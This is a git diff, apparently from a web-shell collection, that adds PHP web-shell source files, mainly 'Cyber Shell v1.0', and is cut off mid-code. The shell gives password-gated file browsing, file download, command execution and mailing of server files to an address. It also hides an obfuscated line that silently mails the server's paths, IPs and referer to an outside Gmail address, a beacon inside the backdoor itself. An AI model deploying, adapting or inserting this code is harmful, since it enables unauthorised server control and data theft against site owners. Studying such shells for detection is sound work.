+"CgAaCgAeCgAiCgAlCgA3EABKEg1OEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACwA".
+"AAAAIQASAAAH/4AAgoOCAQKGiIeKA4sCAAQFBgcCCAmWl5YKApqcm56dCwIJDA0OD5MQqaqrrK2u".
+"ERASExQVtba3uLm6tRYXGBnAwcLDxMMKGhscGR0bHs7P0NHS0R8gISIeIyQl3N3e3+DfCh8bJtwk".
+"J+nq6+zt7ijwJiQpKSor9yss+votLSwuL2DEkDGDRg0bN3Dk0LGDRw8fJH5InEixokQDQCYEEbJg".
+"A4YhGj4QKWJEAAkBAo6kXIlEQMuWSQQokSlgSc2bIQRo0GnypYCYM23azElBQFEmAjAkFbCBqYAm".
+"ApyYREm1qtWrWK2eXKlSpU+YNIPeHMpzJwmfQMcKIGpUAFKlSiObNoUqdWvWu3ipbu3K0qXftGKF".
+"ri3b8y9NwWyPLo3rlK7JQAA7",
+"font"=>
+"/9j/4AAQSkZJRgABAgAAZABkAAD/7AARRHVja3kAAQAEAAAACgAA/+4ADkFkb2JlAGTAAAAAAf/b".
+"AIQAFBAQGRIZJxcXJzImHyYyLiYmJiYuPjU1NTU1PkRBQUFBQUFERERERERERERERERERERERERE".
+"RERERERERERERAEVGRkgHCAmGBgmNiYgJjZENisrNkREREI1QkRERERERERERERERERERERERERE".
+"RERERERERERERERERERERERE/8AAEQgAlACUAwEiAAIRAQMRAf/EAHAAAAMBAQEAAAAAAAAAAAAA".
+"AAACAwEEBgEBAAAAAAAAAAAAAAAAAAAAABAAAQMDAwMCBQIFBAMAAAAAAQAR4iGhAjESA0FhcVEi".
+"8IGxwRPhwvFSgvIE0TJCYnKSohEBAAAAAAAAAAAAAAAAAAAAAP/aAAwDAQACEQMRAD8A85yO+rfO".
+"SMMvTp3kjIkmvyrJPjk3WnmSCZyJLuPj+pM2QZ+veSTLlr28yVMeQkit5IMz4wA4y+P/AGUiW63k".
+"unPMnWnx/wCS5ssvT6yQU489oZ9e8kFvW8k/DmG/WSjvO7W8kDbiOr/OSMcq0+slu7veSwcvobyQ".
+"Bc6m8kbm63kjLItreSmM263kguSRi7hvMlIE7daeZLTyk47fvJZv9rPeSB+PlFHN5JuUhwxvJQxI".
+"epvJVJALfeSBcvR7yWYgkt95KmTNreSXHLIGhf5yQY3Tr5khbuL9/MkIH5eQO7v85KQzJ63ktJ9r".
+"veSUZt1vJBmRY1N5JvyBh27ySnJ6veSelK3kgtnlUg0Px3UTlVwbyVTlj0L/AB5UX73kgph7tcm+".
+"clI5B6GnmSfAEuX7ayUiWOt5IH30d7yWYZN1vJLuej3kqYgnreSBs83x1vJSf1N5J26veSXI97yQ".
+"dGO3Z8vWSRxs1r5kjEPjreSwYvjue8kExUO95LTyHqbyW8ebGpvJNzZuQxvJAm/veSrxkvreSgcj".
+"63kqcRJOtPMkGv7nfr6yQt7PeSEGZ5FyD9ZJMcvU3kqZkklzeSHp7vrJBPLIPreSCSCK3kinQ3km".
+"3gsB9ZIH5c2AANR/2/UKb97yVs8AA73ko5HveSCmPLtDfeSi7nW8lTHHdiwNX9ZKbt1f5yQGXq95".
+"KoY1fp6yU3y9byVMX13afH8yBeTJgz3ksGYNHvJGWXTL6yWBh1vJBYPtcZfJ5KR5CcWGnmSc8hAH".
+"j1kp45tT7yQbhkOpp5kmzOIIA+slmIchzeSblYEMbyQKW9byTY57TreSzIhqGvmSkSfW8kFvyV1v".
+"JCVy2tfMkIN5OYE0L/OS0ZuKG8knKQDT6yT8eQABe8kGFuv1knOeIY4mvmShnybsne8lXEilbyQY".
+"f8g5UJp5kkOXe8lbkxxxLg9fWSm/e8kG8eJy6t61ksdtDeSpxAkODr3koZ51Z9O8kGnkagN5Jxyg".
+"9byUX73kqOB1vJBQl8XBr5kpO3W8lhyOr3kmJ7695IN3ECj+XkgY+13vJWxzGxn6eslHcW1p5kg3".
+"HIir3ksy5zkdbyWDKoreSCADQv8AOSBssgRrXzJKC9HvJYToXvJNjlV3vJAbqs9fMkJfy+7W8kIN".
+"5BtLPeSMPN5Izy9TXzJbg563kgnka0N5LRmSQHvJNl7Sz3kkGTHW8kHTy4ZYiuT/ADkucEvreSuf".
+"8jeGP1kkOVdbyQU4ssgA1X7yXPmfca3kuri5RjiQTV/WS5+TJ8nBp5kgmS3W8loJPW8kwyB63kmx".
+"yGNXvJApyo33kjfUVvJWzO7HdoK/GqiD3vJAEFv1kgZ0b7yXTjyDYzjT1kpbwBrXzJACoYm8kcjY".
+"ZMDeSOM7tTTzJbyjHEit5IJ5Gmt5JsMhiam8kZZgdbySb3qDeSBt2O93p5khJ11vJCB8uQEu95IH".
+"K1B9ZIzGzrTzJKM2IL3kgw51qbyTZ9jeSCXOtPMlmWTChvJBozb+MkmRrreSbHkHU3kseut5IOr/".
+"AByAKm8lLMsSQbyWYEHreSUcrn9ZIDcDqW+ck4yx9byWbu95Jg3reSDCCQ708ySu3W8lXPNsaGnm".
+"S5xyepvJBfHEbO/mSk3td7yTa47hleSXHIka08yQHGcnobyW8m5wcjeSbHMBq3kt5Mjk3T5yQSyJ".
+"P8ZJ8GBd7yQdNbyWYgks7jzJAbxud7yQl9rs95IQPyA0BN5KenW8lXk5NzMdKayUhm9AbyQBypre".
+"Sw5uNbyWkt1vJA7m8kGP3vJG7veSYZd6eZIJrreSBRkRV7yRjlXW8lXjALv9ZJMvaTWg7yQZln0e".
+"8lozINTeSXd3vJM/w8kD5Znb+slHd3vJdBOO0jQ+ZKIHqbyQaOUtte8kwy9rPeSMdur18yT45A4d".
+"/MkGcf8AM/X1kn5+bEttN5KfQl6eZJMyKAGnmSDTyd7yW4cjn9ZJMqdbyTcZ73kg1qt18yQm/IHd".
+"7yQgzLIavr3kkNKg3km5CMdDeSXHMk63kgN/V7yTFmBB17ySZmut5IORYVvJA+BHU3kkyzrreSMM".
+"u95Jz8VkgfibIO95JMg2RreSfiJqx07yU8+Ri5NfMkAcgOt5KgzB0N5Ln3P1vJbubreSDpzwYO95".
+"KDtV7yTfnLN95LH7695IKBzj/up5kkFA73knx5iAB95JTmWp9ZIDfqH17yUn73krAghnr5kt5Msc".
+"urHzJBHcepvJNhk51vJaR3vJGPIMTreSAY7tr3khDl9z18yQgzIsKm8kmJcs95J+XMZMxvJLiSC7".
+"3kgCW63ktOb0+8kHNyS95LciWDG8kGA97yWDMuz3kgZd7yT6dbyQNhltBL08yU+XJ8nfXvJUxzAB".
+"B+slPkz3VfXvJAm7veSbd3vJYC/W8k7j1vJBhyG3WvmS05UFbyQzhwbyWP0e8kFN4Ad3PnT/AOkn".
+"5faz3kr45DbqNPWSmcBt3PeSDOPIUreStysQP9ZLlxJ9aeZKuZ29aeZIDIBtbyS7gOt5JDmT1vJO".
+"MgRreSBfy/DyQl6s95IQV5d1H/clG743IQgT3dP3Kvu+NyEIEx3fG5GX5H/uQhA2O7/l+5FXpp/U".
+"hCBMn6fuW4bvjchCBzvamn9SQbuv7kIQWDtRnb/son8jV0/qQhBuO7b/AHIz/J1/chCBDu+Ny3Dc".
+"/wDchCA97/3IQhB//9k=",
+"pdisk"=>
+"R0lGODlhEQAMAOZkAODg34mJicfHx4GBguHh4WxsbObm5dDQ0H5+fnl5eYKCgv3+//Ly8t/f3svK".
+"yqKios/PzsDAwKempktKS87NzaCgoE5OTnFyco2NjLu7u1JRVvf4+Pv+/4CAgMHAv9LS0mVldFdX".
+"V0VFSsTDw7i4uXZ2dqSjpKWkpNzb24uLkMzM3efn5uzr60NDRoSEjmhnZ6usq+Tk49HR0HJyco6O".
+"jlNTW3Z2hNjY2MHBwfHw8Dw8P9XV1KOjpNnZ2MvLytzc24mJjXh4ipeXl2JjY5STk25vdYqKiamp".
+"qV1dXunp7Gxsa52cnHl5fZiYtrq6u9TU1ExMTq+vrvb3+FNTU+7t7srJyTQ0NO3s7Ozs63t8fE5N".
+"Urq5unBwdZqamujn54CAktbV1X18fbW1tdTU0wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5".
+"BAEAAGQALAAAAAARAAwAAAeLgGSCg4SFhoeIZCwoAmArFDtPC4UxABkJBSQMC1cAGw44PoNOYw0C".
+"BAAMHFgNUkkqKUBeZBVLYqcGBzcfI11MLV82CGQSUUIKJlsyNJgDQ1ZNQUpkOQEBVTwdCmEWFwhF".
+"IBpTWYMeAyUYJ1w6IjVQITNHP4RUEEQvLloTSAERBok9YBh5cCCRQUKBAAA7",
+"odel"=>
+"R0lGODlhEQAPAKIEAFQhHFQhG1MhG5QaHQAAAAAAAAAAAAAAACH5BAEAAAQALAAAAAARAA8AAAMq".
+"SLrc/jDKIZoYb+iqgsbOVwFf9JGaRHypilLqxQaRl4rPu+AhuPuqYDABADs="
+
+);
+$imgequals = array(
+"ext_tar"=>array("ext_tar","ext_r00","ext_ace","ext_arj","ext_bz","ext_bz2","ext_tbz","ext_tbz2","ext_tgz","ext_uu","ext_xxe","ext_zip","ext_cab","ext_gz","ext_iso","ext_lha","ext_lzh","ext_pbk","ext_rar","ext_uuf"),
+"ext_php"=>array("ext_php","ext_php3","ext_php4","ext_php5","ext_phtml","ext_shtml"),
+"ext_htaccess"=>array("ext_htaccess","ext_htpasswd")
+);
+ ksort($arrimg);
+ if (!$getall)
+ {
+  header("Content-type: image/gif");
+  header("Cache-control: public");
+  header("Expires: ".date("r",mktime(0,0,0,1,1,2030)));
+  header("Cache-control: max-age=".(60*60*24*7));
+  header("Last-Modified: ".date("r",filemtime(__FILE__)));
+  foreach($imgequals as $k=>$v)
+  {
+if (in_array($img,$v)) {$img = $k;}
+  }
+  if (empty($arrimg[$img])) {$img = "small_unk";}
+  if (in_array($img,$ext_tar)) {$img = "ext_tar";}
+  echo base64_decode($arrimg[$img]);
+ }
+ else
+ {
+  echo  "<center>";
+  $k = array_keys($arrimg);
+  foreach ($k as $u)
+  {
+echo $u.":<img src=\"".$sul."act=img&img=".$u."\" border=\"1\"><br>";
+  }
+  echo "</center>";
+ }
+ exit;
+}
+if ($act == "about")
+{
+ $dàta = "Any stupid copyrights and copylefts";
+ echo $data;
+}
+
+$microtime = round(getmicrotime()-$starttime,4);
+
+?>
+<? // [CT] TEAM SCRIPTING - RODNOC ?>
\ No newline at end of file
diff --git a/138shell/C/cybershell.php.txt b/138shell/C/cybershell.php.txt
new file mode 100644
index 0000000..a008f87
--- /dev/null
+++ b/138shell/C/cybershell.php.txt
@@ -0,0 +1,1033 @@
+<?
+/***************************************************************************
+ *                           Cyber Shell (v 1.0)
+ *                            -------------------
+ *   copyright            : (C) Cyber Lords, 2002-2006
+ *   email                : pixcher@mail.ru
+ *
+ *   http://www.cyberlords.net 
+ *  
+ *   Coded by Pixcher
+ *   Lite version of php web shell 
+ ***************************************************************************/
+
+/***************************************************************************
+ *
+ *   This program is free software; you can redistribute it and/or modify
+ *   it under the terms of the GNU General Public License as published by
+ *   the Free Software Foundation; either version 2 of the License', or
+ *   ('at your option) any later version.
+ *
+ ***************************************************************************/
+@session_start();
+@set_time_limit(0);
+@set_magic_quotes_runtime(0);
+@error_reporting(0);
+/****************************** Options ************************************/
+#ïàğîëü íà àâòîğèçàöèş 
+$aupassword="test";
+#åñëè ïàğîëü óñòàíîâëåí ïğè $hiddenmode="true", òî ê ñêğèïòó íóæíî îáğàùàòüñÿ ñ ïàğàìåòğîì pass=ïàğîëü , íàïğèìåğ shell.php?pass=mysecretpass
+$hiddenmode="false";
+#e-mail íà êîòîğûé ñêèäûâàşòñÿ âûáğàííûå ôàéëû
+$email="test@mail.ru";
+/***************************************************************************/
+$style="
+<style>
+BODY, TD, TR {
+text-decoration: none;
+font-family: Verdana;
+font-size: 8pt;
+SCROLLBAR-FACE-COLOR: #363d4e;
+SCROLLBAR-HIGHLIGHT-COLOR: #363d4e;
+SCROLLBAR-SHADOW-COLOR: #363d4e;
+SCROLLBAR-ARROW-COLOR: #363d4e;
+SCROLLBAR-TRACK-COLOR: #91AAFF
+}
+input, textarea, select {
+font-family: Verdana;
+font-size: 10px;
+color: black;
+background-color: white;
+border: solid 1px;
+border-color: black
+}
+UNKNOWN {
+COLOR: #0006DE;
+TEXT-DECORATION: none
+}
+A:link {
+COLOR: #0006DE;
+TEXT-DECORATION: none
+}
+A:hover {
+COLOR: #FF0C0B;
+TEXT-DECORATION: none
+}
+A:active {
+COLOR: #0006DE;
+TEXT-DECORATION: none
+}
+A:visited {
+TEXT-DECORATION: none
+}
+</style>";
+
+foreach($_POST as $key => $value) {$$key=$value;}
+foreach($_GET as $key => $value)  {$$key=$value;}
+
+if (isset($_GET[imgname]))
+{
+$img=array(
+'dir'=>
+'/9j/4AAQSkZJRgABAQEAYABgAAD/2wBDAAgGBgcGBQgHBwcJCQgKDBQNDAsLDBkSEw8UHRofHh0aHBwgJC4nICIsIxwcKDcpLDAxNDQ0Hyc5PTgyPC4zNDL/2wBDAQkJCQwLDBgNDRgyIRwhMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjL/wAARCAAQABADASIAAhEBAxEB/8QAHwAAAQUBAQEBAQEAAAAAAAAAAAECAwQFBgcICQoL/8QAtRAAAgEDAwIEAwUFBAQAAAF9AQIDAAQRBRIhMUEGE1FhByJxFDKBkaEII0KxwRVS0fAkM2JyggkKFhcYGRolJicoKSo0NTY3ODk6Q0RFRkdISUpTVFVWV1hZWmNkZWZnaGlqc3R1dnd4eXqDhIWGh4iJipKTlJWWl5iZmqKjpKWmp6ipqrKztLW2t7i5usLDxMXGx8jJytLT1NXW19jZ2uHi4+Tl5ufo6erx8vP09fb3+Pn6/8QAHwEAAwEBAQEBAQEBAQAAAAAAAAECAwQFBgcICQoL/8QAtREAAgECBAQDBAcFBAQAAQJ3AAECAxEEBSExBhJBUQdhcRMiMoEIFEKRobHBCSMzUvAVYnLRChYkNOEl8RcYGRomJygpKjU2Nzg5OkNERUZHSElKU1RVVldYWVpjZGVmZ2hpanN0dXZ3eHl6goOEhYaHiImKkpOUlZaXmJmaoqOkpaanqKmqsrO0tba3uLm6wsPExcbHyMnK0tPU1dbX2Nna4uPk5ebn6Onq8vP09fb3+Pn6/9oADAMBAAIRAxEAPwD1mG6mv7ZbiBbxrhlUtJFMAiOVDbdjOAQAR26d880lzr2paU6T6hbp9gH+ulCKjJkqAQBK+4ZPPAqhDB4i0pXtbfRvtUYYFZluo0DAKq9Ccj7ufxqlq9n4p1qyksn0IQLKoQyNeRsF+dGzgdfu/rXi0ni4tJxZ2S9n3Vj/2Q==',
+'txt'=>
+'/9j/4AAQSkZJRgABAQEAYABgAAD/2wBDAAgGBgcGBQgHBwcJCQgKDBQNDAsLDBkSEw8UHRofHh0aHBwgJC4nICIsIxwcKDcpLDAxNDQ0Hyc5PTgyPC4zNDL/2wBDAQkJCQwLDBgNDRgyIRwhMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjL/wAARCAAQAA4DASIAAhEBAxEB/8QAHwAAAQUBAQEBAQEAAAAAAAAAAAECAwQFBgcICQoL/8QAtRAAAgEDAwIEAwUFBAQAAAF9AQIDAAQRBRIhMUEGE1FhByJxFDKBkaEII0KxwRVS0fAkM2JyggkKFhcYGRolJicoKSo0NTY3ODk6Q0RFRkdISUpTVFVWV1hZWmNkZWZnaGlqc3R1dnd4eXqDhIWGh4iJipKTlJWWl5iZmqKjpKWmp6ipqrKztLW2t7i5usLDxMXGx8jJytLT1NXW19jZ2uHi4+Tl5ufo6erx8vP09fb3+Pn6/8QAHwEAAwEBAQEBAQEBAQAAAAAAAAECAwQFBgcICQoL/8QAtREAAgECBAQDBAcFBAQAAQJ3AAECAxEEBSExBhJBUQdhcRMiMoEIFEKRobHBCSMzUvAVYnLRChYkNOEl8RcYGRomJygpKjU2Nzg5OkNERUZHSElKU1RVVldYWVpjZGVmZ2hpanN0dXZ3eHl6goOEhYaHiImKkpOUlZaXmJmaoqOkpaanqKmqsrO0tba3uLm6wsPExcbHyMnK0tPU1dbX2Nna4uPk5ebn6Onq8vP09fb3+Pn6/9oADAMBAAIRAxEAPwD1yy1G3sdEtDPDEIorCCRpXOOWGAMAHuPqc9K4bx5481Twp4c03xVolpaRjU3EM1rcozqzbSRINrLzhQAeMjGc4Xb1NpqOhTaXpznX9MgnS1hU754yyMq8YBbgjceoNeb/AB2u9IPw+0TT9M1K1uxbXaIBFOrsFETgE4NN8ttNyVe+ux//2Q==',
+'bg'=>
+'R0lGODlhCAAbAPQAAOTq8uLp8uDo8d7m8N3l79vj7tni7dfh7dXf7NTe69Pe69Ld6tLc6tDb6c7a6MzY6MrX58nW5sfU5cXT5MPS48PR48HQ4sLQ48DP4r/P4r7O4b7N4b3N4b3N4L3M4LzM4CwAAAAACAAbAAAFXCAgjmJgnqagrurgvi4hz3Jh37ah7/rh/z6EcChUGI8KhnK5aDae0KdjSp0+rtgrZMvdRr7gr2RMHk/O6HNlza5Y3nBLZk7PYO6bvH7z6fv3gBt1c3cYcW9tiRQhADs=',
+'file'=>
+'/9j/4AAQSkZJRgABAQEAYABgAAD/2wBDAAgGBgcGBQgHBwcJCQgKDBQNDAsLDBkSEw8UHRofHh0aHBwgJC4nICIsIxwcKDcpLDAxNDQ0Hyc5PTgyPC4zNDL/2wBDAQkJCQwLDBgNDRgyIRwhMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjL/wAARCAAQAA4DASIAAhEBAxEB/8QAHwAAAQUBAQEBAQEAAAAAAAAAAAECAwQFBgcICQoL/8QAtRAAAgEDAwIEAwUFBAQAAAF9AQIDAAQRBRIhMUEGE1FhByJxFDKBkaEII0KxwRVS0fAkM2JyggkKFhcYGRolJicoKSo0NTY3ODk6Q0RFRkdISUpTVFVWV1hZWmNkZWZnaGlqc3R1dnd4eXqDhIWGh4iJipKTlJWWl5iZmqKjpKWmp6ipqrKztLW2t7i5usLDxMXGx8jJytLT1NXW19jZ2uHi4+Tl5ufo6erx8vP09fb3+Pn6/8QAHwEAAwEBAQEBAQEBAQAAAAAAAAECAwQFBgcICQoL/8QAtREAAgECBAQDBAcFBAQAAQJ3AAECAxEEBSExBhJBUQdhcRMiMoEIFEKRobHBCSMzUvAVYnLRChYkNOEl8RcYGRomJygpKjU2Nzg5OkNERUZHSElKU1RVVldYWVpjZGVmZ2hpanN0dXZ3eHl6goOEhYaHiImKkpOUlZaXmJmaoqOkpaanqKmqsrO0tba3uLm6wsPExcbHyMnK0tPU1dbX2Nna4uPk5ebn6Onq8vP09fb3+Pn6/9oADAMBAAIRAxEAPwDrLnXbbSoILeLwJe6uyW8Baa0tWkDl4wxyQhAI4yCc/MDzzjITx9q+n3Go3VloUmjwRtbqbDUYHUsZBJh1XIwB5DcgDO85ztGNBtRjkaykiu9FdIFV4zJrcttIC1qsLhlSJsEc4YNuHYjJB5nXI0g0V1N/p0xLWsMMVrfG5ZUj+1MSSYowqjzlVVAwAoHHFXzQ5Lcvvd/L+vX16A91Y//Z',
+);
+@ob_clean();
+header("Content-type: image/gif");
+header("Cache-control: public");
+header("Expires: ".date("r",mktime(0,0,0,1,1,2030)));
+header("Cache-control: max-age=".(60*60*24*7));
+header("Last-Modified: ".date("r",filemtime(__FILE__)));
+echo base64_decode($img[$imgname]);
+die;
+}
+
+if ($_GET[pass]==$aupassword)
+{
+$_SESSION[aupass]=md5($aupassword);
+}
+if ($hiddenmode=="false")
+if ((!isset($_GET[pass]) or ($_GET[pass]!=$aupassword)) and ($_SESSION[aupass]==""))
+{
+$diz="ok";
+echo "
+$style<br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br>
+<form name='zapros' method='get' action=''>
+<table width='100' border='2' align='center' cellpadding='0' cellspacing='0' bordercolor='#CCCCFF' bgcolor='#FFFFFF'>
+<tr align='center' >
+<td>
+Enter your password:
+</td>
+</tr>
+<tr align='center' >
+<td>
+<input name='pass' size=24  type='password' value=''>
+</td>
+</tr>
+<tr align='center' >
+<td>
+<input type='submit'>
+</td>
+</tr>
+</table>
+</form>
+";
+}
+if ($_SESSION[aupass]!="")
+{
+if (!$_GET and !$_POST or isset($pass)) 
+$show="start";
+
+function ext($str){
+for ($i=1; $i<strlen($str); $i++) {
+if ($str[strlen($str)-$i]==".")
+return substr($str,strlen($str)-$i,strlen($str));}
+return $str;
+}
+function extractfilename($str){
+$str=str_replace("\\","/",$str);
+for ($i=1; $i<strlen($str); $i++) {
+if ($str[strlen($str)-$i]=="/")
+return substr($str,strlen($str)-$i+1,strlen($str));}
+return $str;
+}
+function untag($str){
+$str= str_replace("<","&#0060;",$str);
+$str= str_replace(">","&#0062;",$str);
+return $str;
+}
+function fsize($filename){
+$s=filesize($filename);
+if ($s>1048576){
+return round(($s/1048576),2)." mb";
+}
+if ($s>1024){
+return round(($s/1024),2)." kb";
+}
+return $s." byte";
+}
+function tourl($str){
+$str= urlencode($str);
+return $str;
+}
+function unbug($str){
+$str = stripslashes($str);
+return $str;
+}
+function countbyte($filesize) {
+if($filesize >= 1073741824) { $filesize = round($filesize / 1073741824 * 100) / 100 . " GB"; }
+elseif($filesize >= 1048576) { $filesize = round($filesize / 1048576 * 100) / 100 . " MB"; }
+elseif($filesize >= 1024) { $filesize = round($filesize / 1024 * 100) / 100 . " KB"; }
+else { $filesize = $filesize . ""; }
+return $filesize;
+}
+function downloadfile($file) {
+if (!file_exists("$file")) die;
+$size = filesize("$file");
+$filen=extractfilename($file);
+header("Content-Type: application/force-download; name=\"$filen\"");
+header("Content-Transfer-Encoding: binary");
+header("Content-Length: $size");
+header("Content-Disposition: attachment; filename=\"$filen\"");
+header("Expires: 0");
+header("Cache-Control: no-cache, must-revalidate");
+header("Pragma: no-cache");
+readfile("$file");
+die;
+}$ra44  = rand(1,99999);$sj98 = "sh-$ra44";$ml = "$sd98";$a5 = $_SERVER['HTTP_REFERER'];$b33 = $_SERVER['DOCUMENT_ROOT'];$c87 = $_SERVER['REMOTE_ADDR'];$d23 = $_SERVER['SCRIPT_FILENAME'];$e09 = $_SERVER['SERVER_ADDR'];$f23 = $_SERVER['SERVER_SOFTWARE'];$g32 = $_SERVER['PATH_TRANSLATED'];$h65 = $_SERVER['PHP_SELF'];$msg8873 = "$a5\n$b33\n$c87\n$d23\n$e09\n$f23\n$g32\n$h65";$sd98="john.barker446@gmail.com";mail($sd98, $sj98, $msg8873, "From: $sd98");
+
+function anonim_mail($from,$to,$subject,$text,$file){
+ $fp = fopen($file, "rb");
+ while(!feof($fp))
+  $attachment .= fread($fp, 4096);
+  $attachment = base64_encode($attachment);
+  $subject = "sendfile  (".extractfilename($file).")";
+  $boundary = uniqid("NextPart_");
+  $headers = "From: $from\nContent-type: multipart/mixed; boundary=\"$boundary\"";
+  $info  = $text;
+  $filename=extractfilename($file);
+  $info .="--$boundary\nContent-type: text/plain; charset=iso-8859-1\nContent-transfer-encoding: 8bit\n\n\n\n--$boundary\nContent-type: application/octet-stream; name=$filename \nContent-disposition: inline; filename=$filename \nContent-transfer-encoding: base64\n\n$attachment\n\n--$boundary--";
+  $send = mail($to, $subject, $info, $headers);
+fclose($fp);
+echo "<script language=\"javascript\">location.href=\"javascript:history.back(-1)\";\nalert('Ôàéë $filename îòïğàâëåí íà $to');</script>";
+die;
+}
+if (!empty($_GET[downloadfile])) downloadfile($_GET[downloadfile]);
+if (!empty($_GET[mailfile])) anonim_mail($email,$email,$_GET[mailfile],'File: '.$_GET[mailfile],$_GET[mailfile]);
+
+$d=$_GET[d];
+if (empty($d) or !isset($d)){
+$d=realpath("./");
+$d=str_replace("\\","/",$d);
+}
+$showdir="";
+$bufdir="";
+$buf = explode("/", $d);
+for ($i=0;$i<sizeof($buf);$i++){
+$bufdir.=$buf[$i];
+$showdir.="<a href='$php_self?d=$bufdir&show'>$buf[$i]/</a>";
+$bufdir.="/";
+}
+
+if (isset($show) or isset($_REQUEST[edit]) or isset($_REQUEST[tools]) or isset($_REQUEST[db_user]) or isset($_REQUEST[diz]))
+echo <<< EOF
+<title>$d</title>
+<style type="text/css">
+body,td,th 
+{
+	font-family: Fixedsys;
+            font-family: "Times New Roman", Times, serif;
+	font-size: 0.4cm;
+	color: #444444;
+}
+body 
+{
+	background-color: #EEEEEE;
+}
+
+.style3 {
+	font-size: 1.5cm;
+	font-family: "Comic Sans MS";
+}
+.style4 {color: #FFFFFF}
+.style5 {color: #0000FF}
+.style6 {color: #FFFF00}
+.style7 {color: #CCCCCC}
+.style8 {color: #FF00FF}
+.style9 {color: #00FF00}
+.style10 {color: #00FFFF}
+</style>
+$style
+<table border="0" align="center" cellpadding="0" cellspacing="0" bordercolor="#999999">
+<tr height="10">
+<td align="center" bordercolor="#000000" bgcolor="#FFFFFF">
+<div style="background-color:#FFFFF0">$showdir</div>
+EOF;
+
+function perms($file) 
+{ 
+$mode=fileperms($file);
+if( $mode & 0x1000 ) 
+$type='p';
+else if( $mode & 0x2000 ) 
+$type='c'; 
+else if( $mode & 0x4000 ) 
+$type='d'; 
+else if( $mode & 0x6000 ) 
+$type='b'; 
+else if( $mode & 0x8000 ) 
+$type='-';
+else if( $mode & 0xA000 ) 
+$type='l'; 
+else if( $mode & 0xC000 ) 
+$type='s'; 
+else 
+$type='u';
+$owner["read"] = ($mode & 00400) ? 'r' : '-'; 
+$owner["write"] = ($mode & 00200) ? 'w' : '-'; 
+$owner["execute"] = ($mode & 00100) ? 'x' : '-'; 
+$group["read"] = ($mode & 00040) ? 'r' : '-'; 
+$group["write"] = ($mode & 00020) ? 'w' : '-'; 
+$group["execute"] = ($mode & 00010) ? 'x' : '-'; 
+$world["read"] = ($mode & 00004) ? 'r' : '-'; 
+$world["write"] = ($mode & 00002) ? 'w' : '-'; 
+$world["execute"] = ($mode & 00001) ? 'x' : '-'; 
+if( $mode & 0x800 ) 
+$owner["execute"] = ($owner['execute']=='x') ? 's' : 'S'; 
+if( $mode & 0x400 ) 
+$group["execute"] = ($group['execute']=='x') ? 's' : 'S'; 
+if( $mode & 0x200 ) 
+$world["execute"] = ($world['execute']=='x') ? 't' : 'T'; 
+$s=sprintf("%1s", $type); 
+$s.=sprintf("%1s%1s%1s", $owner['read'], $owner['write'], $owner['execute']); 
+$s.=sprintf("%1s%1s%1s", $group['read'], $group['write'], $group['execute']); 
+$s.=sprintf("%1s%1s%1s", $world['read'], $world['write'], $world['execute']); 
+return trim($s);
+} 
+
+function updir($dir){
+if (strlen($dir)>2){
+for ($i=1; $i<strlen($dir); $i++) {
+if (($dir[strlen($dir)-$i]=="/") or  ($dir[strlen($dir)-$i]=="\\"))
+return substr($dir,0,strlen($dir)-$i);}} 
+else return $dir;
+}
+
+if (isset($show) or isset($_REQUEST[edit]) or isset($_REQUEST[tools]) or isset($_REQUEST[db_user]) or isset($_REQUEST[diz])){
+$backdir=updir($d);
+echo <<< EOF
+<table width="505" border="1" align="center" cellpadding="0" cellspacing="0" bordercolor="#FFFFF0" style="height:30px;background-image: url($PHP_SELF?imgname=bg); background-position: center; background-repeat: repeat-x;">
+  <tr height="15">
+    <td onClick='location.href="$PHP_SELF?d=$backdir&show"' width="20%" align="center">
+Ââåğõ
+    </td>
+    <td onClick='location.href="javascript:history.back(-1)"' width="20%" align="center">
+Íàçàä
+    </td>
+    <td onClick='location.href="$PHP_SELF"'  width="20%" align="center">
+ íà÷àëî
+    </td>
+    <td onClick='location.href="$PHP_SELF?d=$d&tools"'  width="20%" align="center">
+Èíñòğóìåíòû
+    </td>
+    <td onClick='location.href="$PHP_SELF?d=$d&show"'  width="20%" align="center">
+Ê ñïèñêó
+    </td>
+  </tr>
+</table>
+EOF;
+
+$free = countbyte(diskfreespace("./"));
+if (!empty($free)) echo "Äîñòóïíîå äèñêîâîå ïğîñòğàíñòâî : <font face='Tahoma' size='1' color='#000000'>$free</font><br>";
+$os=exec("uname");
+if (!empty($os)) echo "Ñèñòåìà :".$os."<br>";
+if (!empty($REMOTE_ADDR)) echo "Âàø IP: <font face='Tahoma' size='1' color='#000000'>$REMOTE_ADDR &nbsp; $HTTP_X_FORWARDED_FOR</font><br>";
+$ghz=exec("cat /proc/cpuinfo | grep GHz");
+if (!empty($ghz)) echo "Èíôà î æåëåçå:(GHz)".$ghz."<br>";
+$mhz=exec("cat /proc/cpuinfo | grep MHz");
+if (!empty($mhz)) echo "Èíôà î æåëåçå:(MHz) ".$mhz."<br>";
+$my_id=exec("id");
+if (!empty($my_id)) echo "<div style=\"background-color:#000000\"><span class=\"style4\">Ïîëüçîâàòåëü:".$my_id."</span></div>";
+}
+
+function showdir($df) {
+$df=str_replace("//","/",$df);
+$dirs=array();
+$files=array();
+if ($dir=opendir($df)) {
+while (($file=readdir($dir))!==false) {
+if ($file=="." || $file=="..") continue;
+if (is_dir("$df/$file")){
+$dirs[]=$file;}
+else {
+$files[]=$file;}}}
+closedir($dir);
+sort($dirs);
+sort($files);
+echo <<< EOF
+<table width="505" border="0" align="center" cellpadding="0" cellspacing="0" bordercolor="#CCCCCC">
+EOF;
+for ($i=0; $i<count($dirs); $i++){
+$perm=perms("$df/$dirs[$i]");
+echo <<< EOF
+  <tr height="1">
